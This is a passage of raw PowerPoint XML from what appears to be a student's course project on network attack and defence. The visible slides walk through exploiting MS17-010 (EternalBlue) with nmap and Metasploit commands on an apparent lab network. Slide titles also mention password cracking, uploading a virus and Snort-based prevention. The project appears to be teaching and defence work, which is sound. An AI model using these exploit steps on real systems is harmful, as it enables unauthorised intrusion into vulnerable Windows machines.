              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to find the computer you want to hack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step3. Input “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” to open the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step4. Input “use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/ms17_010_eternalblue” to choose the exploit you want to attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step5. Input “set LHOST (your IP address)” to set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> address of attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step6. Input “set RHOSTS (the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> of the system you want to hack)” to set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> address of the computer you want to hack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step7. Input “exploit” to start attacking.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36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C38AC-D13F-4C6B-A1DD-E0CB0CA3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CFE0C-0532-48A2-A568-166F838B6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37363"/>
            <a:ext cx="8596668" cy="622074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Using “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 10.103.100.0/24” and we find 10.103.100.82 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> address.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291282-3534-4E2C-A126-715C75F3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66" y="1677251"/>
            <a:ext cx="5581650" cy="1066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1D4840-2863-4F2E-A87C-00A1C437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1137"/>
            <a:ext cx="37909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8CA28-6ECE-407E-9168-DB8A5DE7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1020"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr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BEFA34-D211-4801-836F-FF5F549F0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065240"/>
            <a:ext cx="8596668" cy="571740"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After doing all steps, you will get it.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5EE526-2833-4E54-BBF2-31B4251B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70" y="1451296"/>
            <a:ext cx="5659806" cy="36782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688266-C4AB-4A2C-A2A0-650BAED36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" y="2652234"/>
            <a:ext cx="6002073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5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B897A-0CC6-46EC-8AB1-51D1C155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862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to do it?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BE24C4-67D4-492D-8AA2-AC37E268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845084"/>
            <a:ext cx="8596668" cy="806632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We use port 4444 to connect the port 50451 of the computer we hack.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DF2260-4FAB-4C97-AF0B-74FCE81B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84" y="2058064"/>
            <a:ext cx="5740167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6691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474</TotalTime>
  <Words>1273</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>107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微軟正黑體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>多面向</vt:lpstr>
      <vt:lpstr>網路攻防期末作業</vt:lpstr>
      <vt:lpstr>MS17-010 Introduction</vt:lpstr>
      <vt:lpstr>MS17-010 Introduction</vt:lpstr>
      <vt:lpstr>MS17-010 Introduction</vt:lpstr>
      <vt:lpstr>MS17-010 Introduction</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>How to do it?</vt:lpstr>
      <vt:lpstr>Advance</vt:lpstr>
      <vt:lpstr>How to crack passwords?</vt:lpstr>
      <vt:lpstr>How to crack passwords?</vt:lpstr>
      <vt:lpstr>How to crack passwords?</vt:lpstr>
      <vt:lpstr>How to crack passwords?</vt:lpstr>
      <vt:lpstr>How to crack passwords?</vt:lpstr>
      <vt:lpstr>How to crack password?</vt:lpstr>
      <vt:lpstr>How to crack passwords?</vt:lpstr>
      <vt:lpstr>How to upload a virus to the computer? </vt:lpstr>
      <vt:lpstr>How to upload a virus to the computer? </vt:lpstr>
      <vt:lpstr>How to prevent this vulnerability?</vt:lpstr>
      <vt:lpstr>How to prevent this vulnerability?</vt:lpstr>
      <vt:lpstr>How to prevent this vulnerability by Snort?</vt:lpstr>
      <vt:lpstr>How to prevent this vulnerability by Snort?</vt:lpstr>
      <vt:lpstr>How to prevent this vulnerability by Snort?</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg</vt:lpstr>
      <vt:lpstr>Easter Egg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網路攻防期末作業</dc:title>
  <dc:creator>王少雷</dc:creator>
  <cp:lastModifiedBy>王少雷</cp:lastModifiedBy>
  <cp:revision>83</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-05T23:22:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-20T06:16:25Z</dcterms:modified>
</cp:coreProperties>
</file>